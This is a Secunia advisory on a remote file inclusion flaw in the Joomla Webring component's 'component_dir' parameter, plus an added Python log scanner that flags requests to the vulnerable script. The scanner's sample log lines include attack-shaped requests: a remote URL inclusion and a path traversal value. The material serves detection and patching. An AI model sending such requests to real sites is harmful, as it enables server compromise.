Joomla Webring Component "component_dir" File Inclusion

SECUNIA ADVISORY ID:
SA21495

VERIFY ADVISORY:
http://secunia.com/advisories/21495/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
Webring 1.x (component for Joomla)
http://secunia.com/product/11410/

DESCRIPTION:
xoron has discovered a vulnerability in the Webring component for
Joomla, which can be exploited by malicious people to compromise a
vulnerable system.

Input passed to the "component_dir" parameter in
administrator/components/com_webring/admin.webring.docs.php is not
properly verified before it is used to include files. This can be
exploited to include arbitrary files from external and local
resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been confirmed in version 1.0. Other versions
may also be affected.
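
Added example, not part of the Secunia advisory: a log check that finds direct requests to the script named above that carry a "component_dir" parameter, and labels the supplied value. The Common/Combined Log Format, the sample lines, and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script and parameter named in the advisory; the path is matched as a suffix
# so that any install prefix (e.g. /site/) is covered.
TARGET = "/administrator/components/com_webring/admin.webring.docs.php"
PARAM = "component_dir"
# Client, request target and status of a Common/Combined Log Format line (assumed format).
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')

def classify(value):
    """Label a parameter value as remote-scheme, local-path or other."""
    v = value
    for _ in range(3):  # undo up to three extra layers of percent-encoding
        v = unquote(v)
    v = v.strip().lower()
    if re.match(r'^[a-z][a-z0-9+.\-]+:', v) or v.startswith(("//", "\\\\")):
        return "remote-scheme"   # URL, stream wrapper or UNC-style location
    if ".." in v or v.startswith("/") or re.match(r'^[a-z]:[\\/]', v):
        return "local-path"      # traversal or absolute filesystem path
    return "other"

def scan(lines):
    """Return (client, status, kind, value) for each request that sets PARAM on TARGET."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        path = re.sub(r'/+', '/', unquote(url.path)).lower()
        if not path.endswith(TARGET):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.split('[')[0] == PARAM:  # also catches the array form component_dir[]
                hits.append((client, int(status), classify(value), value))
    return hits

# Constructed sample log lines (documentation addresses and host names).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?option=com_webring HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:03:44 +0000] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://host.example/x HTTP/1.0" 200 312',
    '198.51.100.7 - - [01/Jan/2024:10:03:51 +0000] "GET /site//administrator/components/com_webring/admin.webring.docs.php?component_dir=..%2F..%2Ftmp HTTP/1.0" 500 0',
    '203.0.113.5 - - [01/Jan/2024:10:09:00 +0000] "GET /administrator/components/com_webring/admin.webring.docs.php HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

With "register_globals" enabled the same variable can also be supplied in a POST body or a cookie, which access logs do not record, so an empty result does not rule out an attempt.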

SOLUTION:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

PROVIDED AND/OR DISCOVERED BY:
xoron

ORIGINAL ADVISORY:
http://milw0rm.com/exploits/2177